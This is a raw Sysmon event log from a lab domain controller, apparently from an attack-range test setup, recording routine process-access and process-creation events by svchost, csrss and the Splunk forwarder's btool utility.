13:36:35.967{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-BD00-00000000A301}4524C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8EE3-6005-BC00-00000000A301}28324512C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE3-6005-BD00-00000000A301}4524C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.981{59A5CD1D-8EE3-6005-BD00-00000000A301}4524C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk 
ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE3-6005-BC00-00000000A301}2832C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000003712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-BC00-00000000A301}2832C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000003710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-BC00-00000000A301}2832C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8EE3-6005-BB00-00000000A301}43564324C:\Windows\system32\cmd.exe{59A5CD1D-8EE3-6005-BC00-00000000A301}2832C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.975{59A5CD1D-8EE3-6005-BC00-00000000A301}2832C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE3-6005-BB00-00000000A301}4356C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000003699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.967{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-BB00-00000000A301}4356C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 